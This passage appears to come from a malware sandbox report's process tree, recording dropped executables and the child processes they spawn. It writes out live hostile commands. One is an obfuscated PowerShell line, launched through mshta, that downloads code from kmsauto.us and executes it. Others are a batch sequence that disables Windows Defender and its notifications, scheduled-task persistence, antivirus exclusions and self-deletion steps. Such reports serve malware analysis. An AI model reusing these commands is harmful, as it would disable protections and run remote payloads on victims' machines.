- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:26976
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:696
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:26212
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:27124
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:27876
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:28076
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:28380
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:27780
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:28344
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:26168
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:27928
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:27620
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:27052
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:28532
- C:\Users\Admin\Documents\vIYd2QFsGaAmUJlDeZrlPZu5.exe
  "C:\Users\Admin\Documents\vIYd2QFsGaAmUJlDeZrlPZu5.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:628
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5568
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5516
- C:\Users\Admin\Documents\WbcZX_p1JgKzVjdgEOsRioaK.exe
  "C:\Users\Admin\Documents\WbcZX_p1JgKzVjdgEOsRioaK.exe"
  2⤵
  - Executes dropped EXE
  PID:3788
- - C:\Users\Admin\Documents\WbcZX_p1JgKzVjdgEOsRioaK.exe
    "C:\Users\Admin\Documents\WbcZX_p1JgKzVjdgEOsRioaK.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:4644
- C:\Users\Admin\Documents\9x2W8G2wxFeun1r8CkSaztnw.exe
  "C:\Users\Admin\Documents\9x2W8G2wxFeun1r8CkSaztnw.exe"
  2⤵
  - Executes dropped EXE
  PID:3876
- - C:\Users\Admin\AppData\Local\Temp\J4iLBpIC.com
    "C:\Users\Admin\AppData\Local\Temp\J4iLBpIC.com"
    3⤵
    PID:6872
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C2.tmp\C3.tmp\C4.bat C:\Users\Admin\AppData\Local\Temp\J4iLBpIC.com"
      4⤵
      PID:4296
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        5⤵
        
        PID:6184
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start=disabled
        5⤵
        
        PID:6460
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start=disabled
        5⤵
        
        PID:3624
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisDrv start=disabled
        5⤵
        
        PID:7232
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisSvc start=disabled
        5⤵
        
        PID:7720
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:8108
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:188
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8064
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4736
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7192
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8704
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:9104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8864
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:9108
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4232
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:8460
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:4692
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        
        PID:4972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
        5⤵
        
        PID:8216
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
        6⤵
        
        PID:9036
      - C:\Windows\system32\find.exe
        
        find /i "SecHealthUI"
        6⤵
        
        PID:9244
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:9924
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-3686645723-710336880-414668232-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:4900
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        5⤵
        
        PID:9720
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        6⤵
        
        PID:10132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
        5⤵
        
        PID:9844
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:9228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:4560
- - C:\Users\Admin\AppData\Local\Temp\CBGpR6Jc.com
    "C:\Users\Admin\AppData\Local\Temp\CBGpR6Jc.com"
    3⤵
    PID:772
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
      4⤵
      PID:6296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:8960
- - C:\Users\Admin\AppData\Local\Temp\eCOzolH7.com
    "C:\Users\Admin\AppData\Local\Temp\eCOzolH7.com"
    3⤵
    PID:6924
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
      4⤵
      PID:8928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:8204
- C:\Users\Admin\Documents\MES1QC6ysZPfVSr2Dmz4ml4L.exe
  "C:\Users\Admin\Documents\MES1QC6ysZPfVSr2Dmz4ml4L.exe"
  2⤵
  - Executes dropped EXE
  PID:1916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 664
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4372
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 668
    3⤵
    - Program crash
    PID:5432
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 684
    3⤵
    - Program crash
    PID:5936
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 656
    3⤵
    - Program crash
    PID:6080
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1080
    3⤵
    - Program crash
    PID:2740
- C:\Users\Admin\Documents\JAiRuPBEL6ZLTfCsbtGVppmG.exe
  "C:\Users\Admin\Documents\JAiRuPBEL6ZLTfCsbtGVppmG.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Users\Admin\Documents\FtKfI7E3gVulCNzQ8X_4V1Vj.exe
  "C:\Users\Admin\Documents\FtKfI7E3gVulCNzQ8X_4V1Vj.exe"
  2⤵
  - Executes dropped EXE
  PID:3772
- C:\Users\Admin\Documents\_VokuFN2ESnYQ2PavJ3qGDoi.exe
  "C:\Users\Admin\Documents\_VokuFN2ESnYQ2PavJ3qGDoi.exe"
  2⤵
  - Executes dropped EXE
  PID:1776
- - C:\Users\Admin\AppData\Local\Temp\6f727cda-c514-4581-8778-4ffffd83d205\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\6f727cda-c514-4581-8778-4ffffd83d205\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6f727cda-c514-4581-8778-4ffffd83d205\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:6000
  - - C:\Users\Admin\AppData\Local\Temp\6f727cda-c514-4581-8778-4ffffd83d205\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\6f727cda-c514-4581-8778-4ffffd83d205\AdvancedRun.exe" /SpecialRun 4101d8 6000
      4⤵
      PID:6916
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\_VokuFN2ESnYQ2PavJ3qGDoi.exe" -Force
    3⤵
    PID:6460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\_VokuFN2ESnYQ2PavJ3qGDoi.exe" -Force
    3⤵
    PID:7320
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:7364
- C:\Users\Admin\Documents\5QUp87yluk45CMHjK3tezavK.exe
  "C:\Users\Admin\Documents\5QUp87yluk45CMHjK3tezavK.exe"
  2⤵
  - Executes dropped EXE
  PID:3524
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im 5QUp87yluk45CMHjK3tezavK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5QUp87yluk45CMHjK3tezavK.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:1820
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im 5QUp87yluk45CMHjK3tezavK.exe /f
      4⤵
      Kills process with taskkill
      PID:8076
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:7952
- C:\Users\Admin\Documents\4nrfpWHneqTupoI11V8JLt6f.exe
  "C:\Users\Admin\Documents\4nrfpWHneqTupoI11V8JLt6f.exe"
  2⤵
  - Executes dropped EXE
  PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im 4nrfpWHneqTupoI11V8JLt6f.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\4nrfpWHneqTupoI11V8JLt6f.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:1776
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im 4nrfpWHneqTupoI11V8JLt6f.exe /f
      4⤵
      Kills process with taskkill
      PID:8116
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:17288
- C:\Users\Admin\Documents\WbaEZ41fIiXVPDHICkhnqfSV.exe
  "C:\Users\Admin\Documents\WbaEZ41fIiXVPDHICkhnqfSV.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2104
- C:\Users\Admin\Documents\rRx3gkw45YblF0SJdOpg4IZU.exe
  "C:\Users\Admin\Documents\rRx3gkw45YblF0SJdOpg4IZU.exe"
  2⤵
  - Executes dropped EXE
  PID:3796
- C:\Users\Admin\Documents\vNwcpcDQI_1GFds7EfgjaA6r.exe
  "C:\Users\Admin\Documents\vNwcpcDQI_1GFds7EfgjaA6r.exe"
  2⤵
  - Executes dropped EXE
  PID:684
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "vNwcpcDQI_1GFds7EfgjaA6r.exe" /f & erase "C:\Users\Admin\Documents\vNwcpcDQI_1GFds7EfgjaA6r.exe" & exit
    3⤵
    PID:7072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "vNwcpcDQI_1GFds7EfgjaA6r.exe" /f
      4⤵
      Kills process with taskkill
      PID:6836
- C:\Users\Admin\Documents\wOqqdZSlzY3eeVsDcThcBP2y.exe
  "C:\Users\Admin\Documents\wOqqdZSlzY3eeVsDcThcBP2y.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3784
- C:\Users\Admin\Documents\rN4MICy74_ONqrzmtiWD6m9R.exe
  "C:\Users\Admin\Documents\rN4MICy74_ONqrzmtiWD6m9R.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3152
- - C:\Users\Admin\Documents\rN4MICy74_ONqrzmtiWD6m9R.exe
    "C:\Users\Admin\Documents\rN4MICy74_ONqrzmtiWD6m9R.exe"
    3⤵
    - Executes dropped EXE
    PID:4352
- C:\Users\Admin\Documents\mYYZg1MTWt3e9GiK4RCXLa5_.exe
  "C:\Users\Admin\Documents\mYYZg1MTWt3e9GiK4RCXLa5_.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3680
- C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
  "C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:4364
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:4508
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:4872
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:4904
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:184
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:5856
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:5484
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:4484
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:5132
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    - Executes dropped EXE
    PID:5064
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:4936
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:6084
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:4524
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:3624
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:6388
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:6708
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7160
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7004
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:2876
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:6552
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7416
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7844
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7248
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7748
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:3800
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:1236
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:8744
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:4192
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:5852
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:8288
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:9128
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:5448
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:4548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 24
      4⤵
      Program crash
      PID:4212
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:8216
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:6080
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:9356
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:9820
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:10200
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:9364
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:10076
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:9768
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:9848
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:1912
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:10232
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:7356
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:8692
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
